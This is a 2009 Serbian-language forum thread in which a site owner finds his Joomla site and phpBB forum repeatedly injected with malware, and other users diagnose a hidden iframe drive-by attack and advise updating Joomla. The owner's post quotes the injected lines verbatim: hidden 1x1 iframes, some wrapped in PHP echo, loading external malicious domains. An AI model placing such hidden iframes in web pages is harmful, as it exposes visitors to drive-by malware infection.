Poslao: 20 Apr 2009 00:10
|
offline
- Bojan Denić
- Zaslužni građanin
- Pridružio: 01 Apr 2006
- Poruke: 658
- Gde živiš: Kruševac
|
da li je ovo do mene ili stvarno na hostu imam ubacen virus?
|
|
|
Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
|
|
Poslao: 20 Apr 2009 00:16
|
offline
- pixxel
- Legendarni građanin
- Pridružio: 21 Jun 2005
- Poruke: 9091
- Gde živiš: Tu i tamo...
|
Napisano: 20 Apr 2009 0:13
Proveri kod - i na coolinarici se od juce desava to (moja mama visi tamo) i ima neki iframe koji vuce na neki kineski sajt, koji protura neki pdf dokument koji je zatazen...
Dopuna: 20 Apr 2009 0:16
Da evo sad sam pogledao i kod tebe - potpuno isti sajt je u pitanju - isti iframe exploit...
|
|
|
|
Poslao: 20 Apr 2009 20:46
|
offline
- Bojan Denić
- Zaslužni građanin
- Pridružio: 01 Apr 2006
- Poruke: 658
- Gde živiš: Kruševac
|
Napisano: 20 Apr 2009 0:26
hmmmm...sajt mi je radjen u joomli, a forum mi je phpbb, tako da ne znam sta da gledam :S
i to se desilo pre jedno 20 minuta kada pocelo da mi blokira sajt kao i forum...da li postoji jos neko resenje?
Dopuna: 20 Apr 2009 20:46
sredio sam problem. u svim fajlovima od sajta kao i foruma gde se pominje index.php i index.html je ubacio ove frejmove:
echo "<iframe src=\"http://sefauro.net/?click=6B1813\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
echo "<iframe src=\"http://sefauro.net/?click=1B47575\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
sinoc i danas su sve svi zalili na ove napade i tako da obevezno radite backup.
|
|
|
|
Poslao: 21 Apr 2009 00:01
|
offline
- pixxel
- Legendarni građanin
- Pridružio: 21 Jun 2005
- Poruke: 9091
- Gde živiš: Tu i tamo...
|
Verovatno koriste neki propust u samoj joomli, pa injektuju kod. Cim izadje nova verzija, updateuj...
|
|
|
|
Poslao: 21 Apr 2009 00:40
|
offline
- Bojan Denić
- Zaslužni građanin
- Pridružio: 01 Apr 2006
- Poruke: 658
- Gde živiš: Kruševac
|
opet su mi ubacili ove frejmove na sajtu :S
nije proslo ni 3-4 sata kako sam dogao sve iz pocetka :S
|
|
|
|
Poslao: 21 Apr 2009 01:35
|
offline
- pixxel
- Legendarni građanin
- Pridružio: 21 Jun 2005
- Poruke: 9091
- Gde živiš: Tu i tamo...
|
Pa kazem ti da koriste propust u softveru joomle. Mozes ti da brises koliko hoces, oni idu redom i vracaju, dok se ne "zaleci" taj propust... E sad, jedino ako imas neki nezavisni plugin, mozda se provlaci kroz njega...
|
|
|
|
Poslao: 21 Apr 2009 12:10
|
offline
- m4rk0
- Administrator
- Administrator tech foruma
- Marko Vasić
- Gladijator - Maximus Decimus Meridius
- Pridružio: 14 Jan 2005
- Poruke: 15766
- Gde živiš: Majur (Colosseum)
|
Salji mail joomla timu.
|
|
|
|